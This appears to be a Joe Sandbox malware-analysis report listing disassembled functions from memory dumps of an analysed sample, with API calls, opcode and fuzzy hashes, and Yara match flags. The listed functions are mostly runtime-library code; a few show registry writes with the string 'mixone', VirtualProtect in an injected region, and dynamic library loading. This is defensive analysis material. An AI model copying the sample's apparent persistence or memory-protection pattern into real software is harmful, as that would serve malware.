                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: 0a5d0bd6c222bbdd43f8b319fa79a96d429a9708f3c046b0ae0cbd11a01f7e51
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 11418535A00219DBCF10EF69C885A9EBBA5EF44318F14C17AE8147B3E2D7399905CBD9
                                            Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                            • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                            • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                            • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                            • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                            • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                            Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 0-537541572
                                            • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                            • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                            • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                            • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                            Function 00413339 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,00413448,00403597,?,00000000,00402809,0040280B,?,004135C1,00000022,FlsSetValue,00422950,00422958,00402809), ref: 004133FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 3664257935-537541572
                                            • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction ID: 89836d951bc72d4e20e2faa1a52db581b462940ce5fd44a8dff6846afbaeb460
                                            • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction Fuzzy Hash: A3212731B01214EBDB329F21DC44ADB7B68AB41765B200133ED15A73D1DA78EE46C6DC
                                            Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                            • __fassign.LIBCMT ref: 1000B905
                                            • __fassign.LIBCMT ref: 1000B922
                                            • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 1735259414-0
                                            • Opcode ID: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                            • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                            • Opcode Fuzzy Hash: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                            • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                            Function 0040B984 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,0040B97B,0040AF1F,0040A730), ref: 0040B992
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9A0
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9B9
                                            • SetLastError.KERNEL32(00000000,0040B97B,0040AF1F,0040A730), ref: 0040BA0B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: c1383cefff0a9c77c0f6256a7d22d0577fd0bc713188e5814d490c4ea7085b9f
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 6D0192727197119EE63427B97CC6A6B2B94EB01778760033BF520752E2EB39480255CC
                                            Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                            • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                            • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                            • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                            • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                            Function 04D1BBEB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,04D1BBE2,04D1B186,04D1A997), ref: 04D1BBF9
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04D1BC07
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04D1BC20
                                            • SetLastError.KERNEL32(00000000,04D1BBE2,04D1B186,04D1A997), ref: 04D1BC72
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: 490cb07dfe9f68bf9e02c66ee26e16554e09e3aa753bf95eeac812cee1a72b16
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 0A01D832319211FEA7342BB9BCC5A6B2E55FB0177CB20023BED25A61F1EE6178026194
                                            Function 004015D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                                            Download Yara Rule
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 004015D5
                                              • Part of subcall function 00409842: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040984E
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 0040160B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 00401642
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00401757
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                            • String ID: string too long
                                            • API String ID: 2123813255-2556327735
                                            • Opcode ID: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                            • Instruction ID: 8b29ff92f67febe7d184f40cd986ab90276924f3587203b15f4be4e0e60d2281
                                            • Opcode Fuzzy Hash: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                            • Instruction Fuzzy Hash: 5E4127B1A00300ABD720AF759C8575BB7B8EF48354F24063AF91AE73D1E775AD0487A9
                                            Function 004058D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122registrysleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CloseCreateOpenSleepValue
                                            • String ID: mixone
                                            • API String ID: 4111408922-3123478411
                                            • Opcode ID: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                            • Instruction ID: 36deb0a2def4af7d69c3889f60f670a394a8a5da25757ff3a02b89eea185ed5b
                                            • Opcode Fuzzy Hash: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                            • Instruction Fuzzy Hash: F3418571210108AFEB08DF58DC95BEE7B65EF08300F908229F955AB5D1D778E9848F58
                                            Function 00410580 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,92291A76,0040280B,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105B5
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004105C7
                                            • FreeLibrary.KERNEL32(00000000,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105E9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                            • Instruction ID: f4dd53f2cc94282f557b0741292325b7031a84366b21a1c3c136dd1e19965a8c
                                            • Opcode Fuzzy Hash: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                            • Instruction Fuzzy Hash: F501A271A44625FBDB128F80DC05BEEBBB9FB04B51F004536F811A22A0DBB8A944CB58
                                            Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                            • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                            • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                            • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                            • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                            Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                            • __alloca_probe_16.LIBCMT ref: 1000A736
                                            • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                            • __freea.LIBCMT ref: 1000A837
                                            • __freea.LIBCMT ref: 1000A843
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: __alloca_probe_16__freea$Info
                                            • String ID:
                                            • API String ID: 2330168043-0
                                            • Opcode ID: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                            • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                            • Opcode Fuzzy Hash: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                            • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                            Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                            Download Yara Rule
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 1000B03B
                                            • __alloca_probe_16.LIBCMT ref: 1000B101
                                            • __freea.LIBCMT ref: 1000B16D
                                              • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                            • __freea.LIBCMT ref: 1000B176
                                            • __freea.LIBCMT ref: 1000B199
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 1423051803-0
                                            • Opcode ID: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                            • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                            • Opcode Fuzzy Hash: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                            • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                            Function 00415010 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                            Download Yara Rule
                                            APIs
                                            • __alloca_probe_16.LIBCMT ref: 00415095
                                            • __alloca_probe_16.LIBCMT ref: 0041515E
                                            • __freea.LIBCMT ref: 004151C5
                                              • Part of subcall function 00413C79: RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                            • __freea.LIBCMT ref: 004151D8
                                            • __freea.LIBCMT ref: 004151E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                            • String ID:
                                            • API String ID: 1423051803-0
                                            • Opcode ID: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                            • Instruction ID: def92c4ecd74f4627ee81fabb5ad5435351d3551a42f570b1979e48308b83863
                                            • Opcode Fuzzy Hash: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                            • Instruction Fuzzy Hash: 1A51B372A00646FFDB225FA1CC41FFB3AA9EF84754B25002FFD04D6251EA39CD918668
                                            Function 04D12C87 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 04D12D2F
                                            • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04D12D44
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04D12D52
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04D12D6D
                                            • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04D12D8C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                            • String ID:
                                            • API String ID: 2509773233-0
                                            • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                            • Instruction ID: 0f76adbb077188df71153009ea25e65a9bbd457eedd8e14f7a7a4c45e65c8241
                                            • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                            • Instruction Fuzzy Hash: 4B310335B00104BFDB149F58EC40FAAB7A9FF48300F4541E9EE05AB261DB72AD16CB94
                                            Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                            • String ID:
                                            • API String ID: 3136044242-0
                                            • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                            • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                            • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                            • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                            Function 0040CA97 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAA4
                                            • GetLastError.KERNEL32(?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C836), ref: 0040CAAE
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CAD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID: api-ms-
                                            • API String ID: 3177248105-2084034818
                                            • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                            • Instruction ID: aef67c255cc06d75e4f2c7ed4f9f6bc06eb467b970858842cb7b754112db4c8a
                                            • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                            • Instruction Fuzzy Hash: 12E01230380308F6EF105F61ED46B5A3F569B11B54F108131F90DF85E1D7B5A815998C
                                            Function 0041968C Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(92291A76,00000000,00000000,00000000), ref: 004196EF
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419941
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419987
                                            • GetLastError.KERNEL32 ref: 00419A2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                            • Instruction ID: 80e927e20e1d5b3063f5f9ef1e9119d7a86b1541eeacf5ee68ba8f7951c90f01
                                            • Opcode Fuzzy Hash: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                            • Instruction Fuzzy Hash: 8CD18DB5E002489FCF15CFA8C8909EEBBB5FF49314F28412AE456EB351D634AD86CB54
                                            Function 04D298F3 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04D29956
                                              • Part of subcall function 04D251BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04D25422,?,00000000,-00000008), ref: 04D25220
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04D29BA8
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04D29BEE
                                            • GetLastError.KERNEL32 ref: 04D29C91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                            • Instruction ID: 56d22a9b93d6ad10f1e8b024d20fb3950584ff2cda9d6651bc467ac9500f8485
                                            • Opcode Fuzzy Hash: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
